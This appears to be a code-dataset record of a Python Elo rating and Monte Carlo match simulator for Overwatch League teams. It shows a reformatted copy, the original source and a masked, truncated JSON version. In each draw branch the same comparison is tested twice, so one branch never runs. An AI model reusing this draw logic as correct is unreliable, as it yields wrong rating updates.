self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1 ]] for m in mapnames} self.margins_of_victory = [x for x in season.margins_of_victory] self.standings = {t: {'w': season.standings[t]['w'], 'l': season. standings[t]['l'], 'd': season.standings[t]['d']} for t in teams} def calculateElos(self): def applyStageDecay(): for t in teams: self.overall_elos[t] *= decay_factor for m in mapnames: self.mapname_elos[t][m] *= decay_factor for m in maptypes: self.maptype_elos[t][m] *= decay_factor for i in range(4): stage = self.matchdata['stages'][i] applyStageDecay() for t in teams: self.elorecords[t][i].append(self.overall_elos[t]) for match in (stage['regular'] + stage['playoffs']): if not match['completed']: continue t1, t2 = match['t1'], match['t2'] if i == 3: self.stage4played[t1] += 1 self.stage4played[t2] += 1 if match in stage['regular']: if len([x for x in match['maps'] if x['result'] == 't1'] ) > len([x for x in match['maps'] if x['result'] == 't2']): self.standings[t1]['w'] += 1 self.standings[t2]['l'] += 1 else: self.standings[t1]['l'] += 1 self.standings[t2]['w'] += 1 for map in match['maps']: t1_elo = self.overall_elos[t1 ] * overall_weight + self.mapname_elos[t1][map[ 'mapname']] * mapname_weight + self.maptype_elos[t1][ map['maptype']] * maptype_weight t2_elo = self.overall_elos[t2 ] * overall_weight + self.mapname_elos[t2][map[ 'mapname']] * mapname_weight + self.maptype_elos[t2][ map['maptype']] * maptype_weight exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d)) exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d)) act_t1 = 1 if map['result'] == 't1' else 0 if map['result' ] == 't2' else 0.5 act_t2 = 1 if map['result'] == 't2' else 0 if map['result' ] == 't1' else 0.5 self.map_draws[map['mapname']][0 ] += 1 if act_t1 == 0.5 else 0 self.map_draws[map['mapname']][1] += 1 if match in stage['regular']: self.standings[t1]['d'] += 1 if map['result' ] == 't1' else -1 if map['result'] == 't2' else 0 self.standings[t2]['d'] += 1 if map['result' ] == 't2' else -1 if map['result'] == 't1' else 0 MoV = 1 elo_dif = 0 if act_t1 == 1: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif act_t2 == 1: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo self.margins_of_victory.append(MoV) mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[t1] += t1_change self.maptype_elos[t1][map['maptype']] += t1_change self.mapname_elos[t1][map['mapname']] += t1_change self.overall_elos[t2] += t2_change self.maptype_elos[t2][map['maptype']] += t2_change self.mapname_elos[t2][map['mapname']] += t2_change self.elorecords[t1][i].append(self.overall_elos[t1]) self.elorecords[t2][i].append(self.overall_elos[t2]) def getMapType(self, name): types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony', 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict. fromkeys(['dorado', 'junkertown', 'rialto', 'route-66', 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([ 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row', 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios', 'lijiang', 'nepal', 'oasis'], 'control')} return types[name] def predictMatch(self, team1, team2, maps, loops=10000): results = {} team1wins = 0 maptypes = list(map(self.getMapType, maps)) for x in range(loops): team1score = 0 team2score = 0 for i in range(len(maps)): drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps [i]][1] elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][maps[i] ] * mapname_weight + self.maptype_elos[team1][maptypes[i] ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][maps[i] ] * mapname_weight + self.maptype_elos[team2][maptypes[i] ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) if random_roll < team1winchance - drawchance / 2: team1score += 1 elif random_roll < team1winchance + drawchance / 2: pass else: team2score += 1 if team1score == team2score: map5 = random.choice([m for m in ['ilios', 'busan', 'lijiang'] if m not in maps]) elo1 = self.overall_elos[team1 ] * overall_weight + self.maptype_elos[team1]['control' ] * maptype_weight + self.mapname_elos[team1][map5 ] * mapname_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.maptype_elos[team2]['control' ] * maptype_weight + self.mapname_elos[team2][map5 ] * mapname_weight if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)): team1score += 1 else: team2score += 1 scoreline = '{}-{}'.format(team1score, team2score) if scoreline not in results: results[scoreline] = 0 results[scoreline] += 1 if team1score > team2score: team1wins += 1 results = {s: (results[s] / loops) for s in results} return results, team1wins / loops def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4): """ Type can be regular, or playoffs. It is assumed team1 is the higher seed. """ types = [self.getMapType(m) for m in maps] score = [0, 0] def simulateMap(mapname, maptype): elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][mapname ] * mapname_weight + self.maptype_elos[team1][maptype ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][mapname ] * mapname_weight + self.maptype_elos[team2][maptype ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1 ] * min(team1winchance, 1 - team1winchance) * 2 if random_roll < team1winchance - drawchance / 2: act_t1, act_t2 = 1, 0 elif random_roll < team1winchance + drawchance / 2: act_t1, act_t2 = 0.5, 0.5 else: act_t1, act_t2 = 0, 1 if updateelos: MoV = random.choice(self.margins_of_victory) exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d)) exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d)) if act_t1 == 1: elo_dif = elo1 - elo2 elif act_t2 == 1: elo_dif = elo2 - elo1 elif elo1 > elo2: elo_dif = elo1 - elo2 elif elo1 > elo2: elo_dif = elo2 - elo1 else: elo_dif = 0 mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[team1] += t1_change self.maptype_elos[team1][maptype] += t1_change self.mapname_elos[team1][mapname] += t1_change self.overall_elos[team2] += t2_change self.maptype_elos[team2][maptype] += t2_change self.mapname_elos[team2][mapname] += t2_change return round(act_t1), round(act_t2) if type == 'regular': for i in range(len(maps)): score1, score2 = simulateMap(maps[i], types[i]) score[0] += score1 score[1] += score2 if score[0] == score[1]: map5 = random.choice([x for x in mapnames if self. getMapType(x) == 'control' and x not in maps]) score1, score2 = simulateMap(map5, 'control') score[0] += score1 score[1] += score2 if score[0] > score[1]: self.standings[team1]['w'] += 1 self.standings[team2]['l'] += 1 else: self.standings[team1]['l'] += 1 self.standings[team2]['w'] += 1 self.standings[team1]['d'] += score[0] - score[1] self.standings[team2]['d'] += score[1] - score[0] if type == 'playoffs': mappreferences = {t: {mt: [x for x in postseasonmappool if self .getMapType(x) == mt] for mt in maptypes} for t in [team1, team2]} for t in [team1, team2]: for mt in maptypes: mappreferences[t][mt].sort(key=lambda x: self. mapname_elos[t][x] - self.mapname_elos[{team1: team2, team2: team1}[t]][x], reverse=True) mapprogression = ['control', 'hybrid', 'assault', 'escort'] scores = [0, 0] mnum = 0 played = [] picker = team1 while max(score) < firstto: mtype = mapprogression[mnum % 4] mname = [m for m in mappreferences[picker][mtype] if m not in played][0] played.append(mname) mnum += 1 score1, score2 = simulateMap(mname, mtype) if score1 == 1: picker = team2 score[0] += 1 elif score2 == 1: picker = team1 score[1] += 1 if score[0] > score[1]: return [team1, team2] else: return [team2, team1] return <|reserved_special_token_1|> import json, requests, math, random #import datagatherer # Constants: start_elo = 0 # Starting elo decay_factor = 0.9 # Decay % between stages k = 30 # k for elo change d = 200 # Difference in elo for 75% expected WR overall_weight = 0.60 # Weigts for different types of elos maptype_weight = 0.20 mapname_weight = 0.20 teams = ['ATL','BOS','CDH','DAL','FLA','GZC','HZS','HOU','LDN','GLA','VAL','NYE','PAR','PHI','SFS','SEO','SHD','TOR','VAN','WAS'] maptypes = ['control','assault','hybrid','escort'] mapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura', 'gibraltar', 'numbani', 'volskaya', 'hollywood', 'dorado', 'nepal', 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis', 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto', 'busan', 'paris'] postseasonmappool = ['lijiang','ilios','busan','horizon-lunar-colony','temple-of-anubis','hanamura','numbani','eichenwalde', 'kings-row','dorado','gibraltar','rialto'] colorrequests = requests.get("https://api.overwatchleague.com/teams",timeout=10).text colordata = json.loads(colorrequests)['competitors'] class EloCalculations: def __init__(self): self.teamcolors = {} for teamdata in colordata: c = teamdata['competitor'] self.teamcolors[c['abbreviatedName']]=["#"+c['primaryColor'],"#"+c['secondaryColor']] self.matchdata = json.loads(open("data.json",'r').read()) self.overall_elos = {t:start_elo for t in teams} self.maptype_elos = {t:{m:start_elo for m in maptypes} for t in teams} self.mapname_elos = {t:{m:start_elo for m in mapnames} for t in teams} self.elorecords = {t:[[],[],[],[]] for t in teams} self.stage4played = {t:0 for t in teams} self.map_draws = {m:[0,0] for m in mapnames} self.standings = {t:{'w':0,'l':0,'d':0} for t in teams} self.margins_of_victory = [] def makeCopy(self, season): self.overall_elos = {t:season.overall_elos[t] for t in teams} self.maptype_elos = {t:{m:season.maptype_elos[t][m] for m in maptypes} for t in teams} self.mapname_elos = {t:{m:season.mapname_elos[t][m] for m in mapnames} for t in teams} self.map_draws = {m:[season.map_draws[m][0],season.map_draws[m][1]] for m in mapnames} self.margins_of_victory = [x for x in season.margins_of_victory] self.standings = {t:{'w':season.standings[t]['w'],'l':season.standings[t]['l'],'d':season.standings[t]['d']} for t in teams} def calculateElos(self): def applyStageDecay(): for t in teams: self.overall_elos[t]*=decay_factor for m in mapnames: self.mapname_elos[t][m]*=decay_factor for m in maptypes: self.maptype_elos[t][m]*=decay_factor for i in range(4): stage = self.matchdata['stages'][i] applyStageDecay() for t in teams: self.elorecords[t][i].append(self.overall_elos[t]) for match in stage['regular']+stage['playoffs']: if not match['completed']: continue t1, t2 = match['t1'], match['t2'] if i==3: self.stage4played[t1]+=1 self.stage4played[t2]+=1 # Season Standing W/L if match in stage['regular']: if len([x for x in match['maps'] if x['result']=='t1'])>len([x for x in match['maps'] if x['result']=='t2']): self.standings[t1]['w']+=1 self.standings[t2]['l']+=1 else: self.standings[t1]['l']+=1 self.standings[t2]['w']+=1 for map in match['maps']: t1_elo = (self.overall_elos[t1]*overall_weight + self.mapname_elos[t1][map['mapname']]*mapname_weight + self.maptype_elos[t1][map['maptype']]*maptype_weight) t2_elo = (self.overall_elos[t2]*overall_weight + self.mapname_elos[t2][map['mapname']]*mapname_weight + self.maptype_elos[t2][map['maptype']]*maptype_weight) exp_t1 = 1/(1+10**((t2_elo-t1_elo)/d)) # Expected Scores exp_t2 = 1/(1+10**((t1_elo-t2_elo)/d)) act_t1 = 1 if map['result']=='t1' else 0 if map['result']=='t2' else 0.5 # Actual Scores act_t2 = 1 if map['result']=='t2' else 0 if map['result']=='t1' else 0.5 self.map_draws[map['mapname']][0] += 1 if act_t1==0.5 else 0 # Draw % self.map_draws[map['mapname']][1] += 1 if match in stage['regular']: self.standings[t1]['d']+= 1 if map['result']=='t1' else -1 if map['result']=='t2' else 0 # Standings Differential self.standings[t2]['d']+= 1 if map['result']=='t2' else -1 if map['result']=='t1' else 0 MoV = 1 # Margin of Victory elo_dif = 0 # Elo Difference if act_t1==1: # The team that won determines the margin of victory MoV = (map['deaths'][t2]+1)/(map['deaths'][t1]+1) elo_dif = t1_elo-t2_elo elif act_t2==1: MoV = (map['deaths'][t1]+1)/(map['deaths'][t2]+1) elo_dif = t2_elo-t1_elo else: # In case of a draw, the team with higher elo determines margin of "victory" if t1_elo>t2_elo: MoV = (map['deaths'][t2]+1)/(map['deaths'][t1]+1) elo_dif = t1_elo-t2_elo elif t1_elo>t2_elo: MoV = (map['deaths'][t1]+1)/(map['deaths'][t2]+1) elo_dif = t2_elo-t1_elo self.margins_of_victory.append(MoV) mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[t1] += t1_change self.maptype_elos[t1][map["maptype"]] += t1_change self.mapname_elos[t1][map["mapname"]] += t1_change self.overall_elos[t2] += t2_change self.maptype_elos[t2][map["maptype"]] += t2_change self.mapname_elos[t2][map["mapname"]] += t2_change self.elorecords[t1][i].append(self.overall_elos[t1]) self.elorecords[t2][i].append(self.overall_elos[t2]) def getMapType(self,name): types = { **dict.fromkeys(['hanamura','horizon-lunar-colony','temple-of-anubis','volskaya','paris'],'assault'), **dict.fromkeys(['dorado','junkertown','rialto','route-66','gibraltar','Havana'],'escort'), **dict.fromkeys(['blizzard-world','eichenwalde','hollywood','kings-row','numbani'],'hybrid'), **dict.fromkeys(['busan','ilios','lijiang','nepal','oasis'],'control') } return types[name] def predictMatch(self,team1, team2, maps, loops = 10000): results = {} team1wins = 0 maptypes = list(map(self.getMapType,maps)) for x in range(loops): team1score = 0 team2score = 0 for i in range(len(maps)): drawchance = self.map_draws[maps[i]][0]/self.map_draws[maps[i]][1] elo1 = (self.overall_elos[team1]*overall_weight + self.mapname_elos[team1][maps[i]]*mapname_weight + self.maptype_elos[team1][maptypes[i]]*maptype_weight) elo2 = (self.overall_elos[team2]*overall_weight + self.mapname_elos[team2][maps[i]]*mapname_weight + self.maptype_elos[team2][maptypes[i]]*maptype_weight) random_roll = random.random() team1winchance = 1/(1+10**((elo2-elo1)/d)) #drawchance *= min(team1winchance,1-team1winchance)*2 if random_roll < team1winchance - drawchance/2: team1score +=1 elif random_roll < team1winchance + drawchance/2: pass else: team2score +=1 if team1score==team2score: map5 = random.choice([m for m in ['ilios','busan','lijiang'] if m not in maps]) elo1 = (self.overall_elos[team1]*overall_weight + self.maptype_elos[team1]['control']*maptype_weight + self.mapname_elos[team1][map5]*mapname_weight) elo2 = (self.overall_elos[team2]*overall_weight + self.maptype_elos[team2]['control']*maptype_weight + self.mapname_elos[team2][map5]*mapname_weight) if random.random()< 1/(1+10**((elo2-elo1)/d)): team1score+=1 else: team2score +=1 scoreline = "{}-{}".format(team1score,team2score) if scoreline not in results: results[scoreline]=0 results[scoreline]+=1 if team1score>team2score: team1wins += 1 results = {s:results[s]/loops for s in results} return results, team1wins/loops def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4): ''' Type can be regular, or playoffs. It is assumed team1 is the higher seed. ''' types = [self.getMapType(m) for m in maps] score = [0,0] def simulateMap(mapname,maptype): elo1 = (self.overall_elos[team1]*overall_weight + self.mapname_elos[team1][mapname]*mapname_weight + self.maptype_elos[team1][maptype]*maptype_weight) elo2 = (self.overall_elos[team2]*overall_weight + self.mapname_elos[team2][mapname]*mapname_weight + self.maptype_elos[team2][maptype]*maptype_weight) random_roll = random.random() team1winchance = 1/(1+10**((elo2-elo1)/d)) drawchance = self.map_draws[mapname][0]/self.map_draws[mapname][1] * min(team1winchance,1-team1winchance)*2 if random_roll < team1winchance - drawchance/2: act_t1, act_t2 = 1,0 elif random_roll < team1winchance + drawchance/2: act_t1, act_t2 = 0.5,0.5 else: act_t1, act_t2 = 0,1 if updateelos: MoV = random.choice(self.margins_of_victory) exp_t1 = 1/(1+10**((elo2-elo1)/d)) # Expected Scores exp_t2 = 1/(1+10**((elo1-elo2)/d)) if act_t1==1: elo_dif = elo1-elo2 elif act_t2==1: elo_dif = elo2-elo1 else: if elo1>elo2: elo_dif = elo1-elo2 elif elo1>elo2: elo_dif = elo2-elo1 else: elo_dif = 0 mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[team1] += t1_change self.maptype_elos[team1][maptype] += t1_change self.mapname_elos[team1][mapname] += t1_change self.overall_elos[team2] += t2_change self.maptype_elos[team2][maptype] += t2_change self.mapname_elos[team2][mapname] += t2_change return round(act_t1),round(act_t2) if type=='regular': for i in range(len(maps)): score1,score2 = simulateMap(maps[i],types[i]) score[0]+=score1 score[1]+=score2 if score[0]==score[1]: map5 = random.choice([x for x in mapnames if self.getMapType(x)=='control' and x not in maps]) score1,score2 = simulateMap(map5,'control') score[0]+=score1 score[1]+=score2 if score[0]>score[1]: self.standings[team1]['w']+=1 self.standings[team2]['l']+=1 else: self.standings[team1]['l']+=1 self.standings[team2]['w']+=1 self.standings[team1]['d']+=score[0]-score[1] self.standings[team2]['d']+=score[1]-score[0] if type=='playoffs': mappreferences = {t:{mt:[x for x in postseasonmappool if self.getMapType(x)==mt] for mt in maptypes} for t in [team1,team2]} for t in [team1,team2]: for mt in maptypes: mappreferences[t][mt].sort(key=lambda x:self.mapname_elos[t][x]-self.mapname_elos[{team1:team2,team2:team1}[t]][x],reverse=True) mapprogression = ['control','hybrid','assault','escort'] scores = [0,0] mnum = 0 played = [] picker = team1 while max(score)<firstto: mtype = mapprogression[mnum%4] mname = [m for m in mappreferences[picker][mtype] if m not in played][0] played.append(mname) mnum += 1 score1,score2 = simulateMap(mname,mtype) if score1==1: picker=team2 score[0]+=1 elif score2==1: picker=team1 score[1]+=1 if score[0]>score[1]: return [team1,team2] else: return [team2,team1] return
flexible
{ "blob_id": "4f84cf80292e2764ca3e4da79858058850646527", "index": 8862, "step-1": "<mask token>\n\n\nclass EloCalculations:\n\n def __init__(self):\n self.teamcolors = {}\n for teamdata in colordata:\n c = teamdata['competitor']\n self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor'\n ], '#' + c['secondaryColor']]\n self.matchdata = json.loads(open('data.json', 'r').read())\n self.overall_elos = {t: start_elo for t in teams}\n self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams\n }\n self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams\n }\n self.elorecords = {t: [[], [], [], []] for t in teams}\n self.stage4played = {t: (0) for t in teams}\n self.map_draws = {m: [0, 0] for m in mapnames}\n self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams}\n self.margins_of_victory = []\n\n def makeCopy(self, season):\n self.overall_elos = {t: season.overall_elos[t] for t in teams}\n self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in\n maptypes} for t in teams}\n self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in\n mapnames} for t in teams}\n self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1\n ]] for m in mapnames}\n self.margins_of_victory = [x for x in season.margins_of_victory]\n self.standings = {t: {'w': season.standings[t]['w'], 'l': season.\n standings[t]['l'], 'd': season.standings[t]['d']} for t in teams}\n\n def calculateElos(self):\n\n def applyStageDecay():\n for t in teams:\n self.overall_elos[t] *= decay_factor\n for m in mapnames:\n self.mapname_elos[t][m] *= decay_factor\n for m in maptypes:\n self.maptype_elos[t][m] *= decay_factor\n for i in range(4):\n stage = self.matchdata['stages'][i]\n applyStageDecay()\n for t in teams:\n self.elorecords[t][i].append(self.overall_elos[t])\n for match in (stage['regular'] + stage['playoffs']):\n if not match['completed']:\n continue\n t1, t2 = match['t1'], match['t2']\n if i == 3:\n self.stage4played[t1] += 1\n self.stage4played[t2] += 1\n if match in stage['regular']:\n if len([x for x in match['maps'] if x['result'] == 't1']\n ) > len([x for x in match['maps'] if x['result'] ==\n 't2']):\n self.standings[t1]['w'] += 1\n self.standings[t2]['l'] += 1\n else:\n self.standings[t1]['l'] += 1\n self.standings[t2]['w'] += 1\n for map in match['maps']:\n t1_elo = self.overall_elos[t1\n ] * overall_weight + self.mapname_elos[t1][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t1][\n map['maptype']] * maptype_weight\n t2_elo = self.overall_elos[t2\n ] * overall_weight + self.mapname_elos[t2][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t2][\n map['maptype']] * maptype_weight\n exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d))\n exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d))\n act_t1 = 1 if map['result'] == 't1' else 0 if map['result'\n ] == 't2' else 0.5\n act_t2 = 1 if map['result'] == 't2' else 0 if map['result'\n ] == 't1' else 0.5\n self.map_draws[map['mapname']][0\n ] += 1 if act_t1 == 0.5 else 0\n self.map_draws[map['mapname']][1] += 1\n if match in stage['regular']:\n self.standings[t1]['d'] += 1 if map['result'\n ] == 't1' else -1 if map['result'] == 't2' else 0\n self.standings[t2]['d'] += 1 if map['result'\n ] == 't2' else -1 if map['result'] == 't1' else 0\n MoV = 1\n elo_dif = 0\n if act_t1 == 1:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif act_t2 == 1:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n self.margins_of_victory.append(MoV)\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[t1] += t1_change\n self.maptype_elos[t1][map['maptype']] += t1_change\n self.mapname_elos[t1][map['mapname']] += t1_change\n self.overall_elos[t2] += t2_change\n self.maptype_elos[t2][map['maptype']] += t2_change\n self.mapname_elos[t2][map['mapname']] += t2_change\n self.elorecords[t1][i].append(self.overall_elos[t1])\n self.elorecords[t2][i].append(self.overall_elos[t2])\n <mask token>\n <mask token>\n\n def simulateSingleMatch(self, team1, team2, maps, type='regular',\n updateelos=True, firstto=4):\n \"\"\"\n Type can be regular, or playoffs.\n It is assumed team1 is the higher seed.\n \"\"\"\n types = [self.getMapType(m) for m in maps]\n score = [0, 0]\n\n def simulateMap(mapname, maptype):\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][mapname\n ] * mapname_weight + self.maptype_elos[team1][maptype\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][mapname\n ] * mapname_weight + self.maptype_elos[team2][maptype\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1\n ] * min(team1winchance, 1 - team1winchance) * 2\n if random_roll < team1winchance - drawchance / 2:\n act_t1, act_t2 = 1, 0\n elif random_roll < team1winchance + drawchance / 2:\n act_t1, act_t2 = 0.5, 0.5\n else:\n act_t1, act_t2 = 0, 1\n if updateelos:\n MoV = random.choice(self.margins_of_victory)\n exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d))\n if act_t1 == 1:\n elo_dif = elo1 - elo2\n elif act_t2 == 1:\n elo_dif = elo2 - elo1\n elif elo1 > elo2:\n elo_dif = elo1 - elo2\n elif elo1 > elo2:\n elo_dif = elo2 - elo1\n else:\n elo_dif = 0\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[team1] += t1_change\n self.maptype_elos[team1][maptype] += t1_change\n self.mapname_elos[team1][mapname] += t1_change\n self.overall_elos[team2] += t2_change\n self.maptype_elos[team2][maptype] += t2_change\n self.mapname_elos[team2][mapname] += t2_change\n return round(act_t1), round(act_t2)\n if type == 'regular':\n for i in range(len(maps)):\n score1, score2 = simulateMap(maps[i], types[i])\n score[0] += score1\n score[1] += score2\n if score[0] == score[1]:\n map5 = random.choice([x for x in mapnames if self.\n getMapType(x) == 'control' and x not in maps])\n score1, score2 = simulateMap(map5, 'control')\n score[0] += score1\n score[1] += score2\n if score[0] > score[1]:\n self.standings[team1]['w'] += 1\n self.standings[team2]['l'] += 1\n else:\n self.standings[team1]['l'] += 1\n self.standings[team2]['w'] += 1\n self.standings[team1]['d'] += score[0] - score[1]\n self.standings[team2]['d'] += score[1] - score[0]\n if type == 'playoffs':\n mappreferences = {t: {mt: [x for x in postseasonmappool if self\n .getMapType(x) == mt] for mt in maptypes} for t in [team1,\n team2]}\n for t in [team1, team2]:\n for mt in maptypes:\n mappreferences[t][mt].sort(key=lambda x: self.\n mapname_elos[t][x] - self.mapname_elos[{team1:\n team2, team2: team1}[t]][x], reverse=True)\n mapprogression = ['control', 'hybrid', 'assault', 'escort']\n scores = [0, 0]\n mnum = 0\n played = []\n picker = team1\n while max(score) < firstto:\n mtype = mapprogression[mnum % 4]\n mname = [m for m in mappreferences[picker][mtype] if m not in\n played][0]\n played.append(mname)\n mnum += 1\n score1, score2 = simulateMap(mname, mtype)\n if score1 == 1:\n picker = team2\n score[0] += 1\n elif score2 == 1:\n picker = team1\n score[1] += 1\n if score[0] > score[1]:\n return [team1, team2]\n else:\n return [team2, team1]\n return\n", "step-2": "<mask token>\n\n\nclass EloCalculations:\n\n def __init__(self):\n self.teamcolors = {}\n for teamdata in colordata:\n c = teamdata['competitor']\n self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor'\n ], '#' + c['secondaryColor']]\n self.matchdata = json.loads(open('data.json', 'r').read())\n self.overall_elos = {t: start_elo for t in teams}\n self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams\n }\n self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams\n }\n self.elorecords = {t: [[], [], [], []] for t in teams}\n self.stage4played = {t: (0) for t in teams}\n self.map_draws = {m: [0, 0] for m in mapnames}\n self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams}\n self.margins_of_victory = []\n\n def makeCopy(self, season):\n self.overall_elos = {t: season.overall_elos[t] for t in teams}\n self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in\n maptypes} for t in teams}\n self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in\n mapnames} for t in teams}\n self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1\n ]] for m in mapnames}\n self.margins_of_victory = [x for x in season.margins_of_victory]\n self.standings = {t: {'w': season.standings[t]['w'], 'l': season.\n standings[t]['l'], 'd': season.standings[t]['d']} for t in teams}\n\n def calculateElos(self):\n\n def applyStageDecay():\n for t in teams:\n self.overall_elos[t] *= decay_factor\n for m in mapnames:\n self.mapname_elos[t][m] *= decay_factor\n for m in maptypes:\n self.maptype_elos[t][m] *= decay_factor\n for i in range(4):\n stage = self.matchdata['stages'][i]\n applyStageDecay()\n for t in teams:\n self.elorecords[t][i].append(self.overall_elos[t])\n for match in (stage['regular'] + stage['playoffs']):\n if not match['completed']:\n continue\n t1, t2 = match['t1'], match['t2']\n if i == 3:\n self.stage4played[t1] += 1\n self.stage4played[t2] += 1\n if match in stage['regular']:\n if len([x for x in match['maps'] if x['result'] == 't1']\n ) > len([x for x in match['maps'] if x['result'] ==\n 't2']):\n self.standings[t1]['w'] += 1\n self.standings[t2]['l'] += 1\n else:\n self.standings[t1]['l'] += 1\n self.standings[t2]['w'] += 1\n for map in match['maps']:\n t1_elo = self.overall_elos[t1\n ] * overall_weight + self.mapname_elos[t1][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t1][\n map['maptype']] * maptype_weight\n t2_elo = self.overall_elos[t2\n ] * overall_weight + self.mapname_elos[t2][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t2][\n map['maptype']] * maptype_weight\n exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d))\n exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d))\n act_t1 = 1 if map['result'] == 't1' else 0 if map['result'\n ] == 't2' else 0.5\n act_t2 = 1 if map['result'] == 't2' else 0 if map['result'\n ] == 't1' else 0.5\n self.map_draws[map['mapname']][0\n ] += 1 if act_t1 == 0.5 else 0\n self.map_draws[map['mapname']][1] += 1\n if match in stage['regular']:\n self.standings[t1]['d'] += 1 if map['result'\n ] == 't1' else -1 if map['result'] == 't2' else 0\n self.standings[t2]['d'] += 1 if map['result'\n ] == 't2' else -1 if map['result'] == 't1' else 0\n MoV = 1\n elo_dif = 0\n if act_t1 == 1:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif act_t2 == 1:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n self.margins_of_victory.append(MoV)\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[t1] += t1_change\n self.maptype_elos[t1][map['maptype']] += t1_change\n 